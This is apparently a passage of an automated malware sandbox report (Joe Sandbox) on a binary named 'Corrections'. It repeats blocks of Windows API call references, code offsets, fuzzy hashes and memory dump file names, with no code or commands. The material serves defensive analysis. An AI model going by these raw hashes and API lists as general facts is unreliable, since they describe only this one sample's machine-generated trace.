                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ba87b9533f33c34f017aab4efa5fa80cd89850cc40d9b5e44be064a04e06d0e5
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88F0C234D0420DB7CF04BEA4EC46E9E776C5EC4354B604521BB24965D2FB71EA5AC6D0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 009A8D52
                                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 009A8D59
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,?), ref: 009A8F3A
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 146820519-0
                                                                                                                                                                                                                                                                                            • Opcode ID: fb07fd3a7e70ad9f7a40335e07949b6945d510b05db9548e71303daca6ce03b7
                                                                                                                                                                                                                                                                                            • Instruction ID: 9e831b2f9f913252936d05e4daab4999faca5ab55aebf86722af0be716c38ec7
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb07fd3a7e70ad9f7a40335e07949b6945d510b05db9548e71303daca6ce03b7
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E2126A71A083419FC714DF28C484B6ABBE5FF89314F14895DE8898B392DB31E945CF92
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 009232AF
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 009232B7
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 009232C2
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 009232CD
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 009232D5
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 009232DD
                                                                                                                                                                                                                                                                                              • Part of subcall function 00923205: RegisterWindowMessageW.USER32(00000004,?,00922964), ref: 0092325D
                                                                                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00922A0A
                                                                                                                                                                                                                                                                                            • OleInitialize.OLE32 ref: 00922A28
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000), ref: 00963A0D
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1986988660-0
                                                                                                                                                                                                                                                                                            • Opcode ID: bcda419ce54bcec0635ae217e495ea2e884620e4869de6a923a048bcb7c6ca0c
                                                                                                                                                                                                                                                                                            • Instruction ID: 2fb41716795a3e78a7ea84db47e2554ed33c2b5085f6531077ca2f74c29ea56c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bcda419ce54bcec0635ae217e495ea2e884620e4869de6a923a048bcb7c6ca0c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A27199B092A3058F8798EF79AD697753BE0BB88354750822AE118CB2B6EB704445FF54
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 009261A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00926299
                                                                                                                                                                                                                                                                                            • KillTimer.USER32(?,00000001,?,?), ref: 0093FD36
                                                                                                                                                                                                                                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0093FD45
                                                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0097FE33
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3500052701-0
                                                                                                                                                                                                                                                                                            • Opcode ID: f73c438c665ea2f7fec544c66047177405cadd20418ddd2d7042823fa295eab4
                                                                                                                                                                                                                                                                                            • Instruction ID: cfc4b51caff513367dacaf20a04e88d43ad0b4a30a6c34926b644e5a2e51ff77
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f73c438c665ea2f7fec544c66047177405cadd20418ddd2d7042823fa295eab4
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9731C871904744AFDB32CF248865BE7BBECAF02708F0044AED5DD67282D7745A85CB51
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,?,?,0095894C,?,009E9CE8,0000000C), ref: 00958A84
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0095894C,?,009E9CE8,0000000C), ref: 00958A8E
                                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00958AB9
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2583163307-0
                                                                                                                                                                                                                                                                                            • Opcode ID: d4976dd2d170aa593a31c8221e92c1c89eeb2bb66235cb843b4bb97ef20af64a
                                                                                                                                                                                                                                                                                            • Instruction ID: b42ef5287e60c0f7633314ffac1ac97f1d01f770fc383b7b06335076b045300e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d4976dd2d170aa593a31c8221e92c1c89eeb2bb66235cb843b4bb97ef20af64a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 78014E326191605AD624E237AC46B7F674D4BC5736F27065AFC14EB1D3DF308D885390
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,009597BA,FF8BC369,00000000,00000002,00000000), ref: 00959744
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,009597BA,FF8BC369,00000000,00000002,00000000,?,00955ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00946F41), ref: 0095974E
                                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00959755
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2336955059-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 3bb8a227358770ef85f2d18514f6b0cbf92c1c5a84ecb2706e3812cc5c402de5
                                                                                                                                                                                                                                                                                            • Instruction ID: c9d0ffd5094865d68d0d496637cbcd9b747007bd0b19b51e344730897a714de4
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3bb8a227358770ef85f2d18514f6b0cbf92c1c5a84ecb2706e3812cc5c402de5
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19012832634119EBDB15DF9ADC05D6E3B29DB89331B25025AFC118B190EB309E419B90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 0092F27B
                                                                                                                                                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 0092F289
                                                                                                                                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0092F29F
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 0092F2B1
                                                                                                                                                                                                                                                                                            • TranslateAcceleratorW.USER32(?,?,?), ref: 009732D8
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3288985973-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 814d345cc9e3eaf8066e8c63559f7525d2a97ca2d77ff7b3931b86e3d3b91056
                                                                                                                                                                                                                                                                                            • Instruction ID: f41300adc98a60c483ebc8fe90d7cf796e71da9330a58ca51895a16ca5d8be94
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 814d345cc9e3eaf8066e8c63559f7525d2a97ca2d77ff7b3931b86e3d3b91056
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E5F0893111934597E770C7A0DD89FEA33ACEF45310F108A28F219C70C4EB709588DB25
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 00933006
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                            • String ID: CALL
                                                                                                                                                                                                                                                                                            • API String ID: 1385522511-4196123274
                                                                                                                                                                                                                                                                                            • Opcode ID: 026e127777796b231569f9bc626ba6faa8045741553d0b529b7ce064cda09913
                                                                                                                                                                                                                                                                                            • Instruction ID: fdcf6c56dd6d5f01a8992f61fbea6c5ec66158a3dda2ef36488ec9ee2b23954c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 026e127777796b231569f9bc626ba6faa8045741553d0b529b7ce064cda09913
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F2277716082019FC724DF24C881B2ABBE5BF98314F24895DF59A8B3A1D775E941CF82
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: 01234f891e3f08cb76143aa5960b8bb92f9d1bbd3fbd9a05f95c4c7ef6c5f0a8
                                                                                                                                                                                                                                                                                            • Instruction ID: f28affed253815a1fef947ebe54b852f6b1672ea51feea92c59818ceae4e04aa
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 01234f891e3f08cb76143aa5960b8bb92f9d1bbd3fbd9a05f95c4c7ef6c5f0a8
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7F32ED32A04615DFDB20DF54D881BAEB7B8FF85310F148958E959AB2A1E731ED40CF91
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetOpenFileNameW.COMDLG32(?), ref: 0096413B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00925851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009255D1,?,?,00964B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00925871
                                                                                                                                                                                                                                                                                              • Part of subcall function 00923A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00923A76
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                                                                                                                            • String ID: X
                                                                                                                                                                                                                                                                                            • API String ID: 779396738-3081909835
                                                                                                                                                                                                                                                                                            • Opcode ID: 9d240b0a2d950431f7bb16fe60839d8e67e1db5784d1b120447a20b77e6936c1
                                                                                                                                                                                                                                                                                            • Instruction ID: ddf364f064042f93c8f1ee4f0aab09de6387542fdb94a68de6f557cd94ab5405
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9d240b0a2d950431f7bb16fe60839d8e67e1db5784d1b120447a20b77e6936c1
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6721EB70A042689BCB11DFD4DC05BEE7BFCAF85304F008019E544B7241DBF89A898FA1
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00923A3C
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 7dfb8600159609db5aa2d636dcb7c818f0b9784af702ed0b5c3e3a891dce2fee
                                                                                                                                                                                                                                                                                            • Instruction ID: f19f5b0fdc5d4d3a43d6dcbc479656231d6b884602465e14daf9144273e1f2d2
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7dfb8600159609db5aa2d636dcb7c818f0b9784af702ed0b5c3e3a891dce2fee
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EF3193B0519711DFD320DF24E884BA7BBE8FB49718F00092EE5D987241E7B5A948CB52
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • IsThemeActive.UXTHEME ref: 0092333D
                                                                                                                                                                                                                                                                                              • Part of subcall function 009232E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 009232FB
                                                                                                                                                                                                                                                                                              • Part of subcall function 009232E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00923312
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00923368,?), ref: 009233BB
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00923368,?), ref: 009233CE
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,009F2418,009F2400,?,?,?,?,?,?,00923368,?), ref: 0092343A
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092338B: SetCurrentDirectoryW.KERNEL32(?,00000001,009F2418,?,?,?,?,?,?,?,00923368,?), ref: 009234BB
                                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00923377
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1550534281-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 8888ff2a59c23c5ab42b945c3544baf855a864f0f318fe0fbf1f485f429ce639
                                                                                                                                                                                                                                                                                            • Instruction ID: ea14debc053ec7d9c4485555b447ab96dcdc6b0b844aedbde11343b8a99c9ca9
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8888ff2a59c23c5ab42b945c3544baf855a864f0f318fe0fbf1f485f429ce639
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 31F05EB257D3459FE300AFB0FD0BB743794A740B19F008915B509861E6DBFE9651EB40
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseHandleSleep
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 252777609-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                            • Instruction ID: e5eebe1ea8c45f9a6774b7445d44c2fa2ce6b1289486ca029e84000481c5da6a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7631B271A00105DFD718DF58D490E69FBBAFB99300B2486A9E509CB656E736EDC1CBC0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 0092CEEE
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
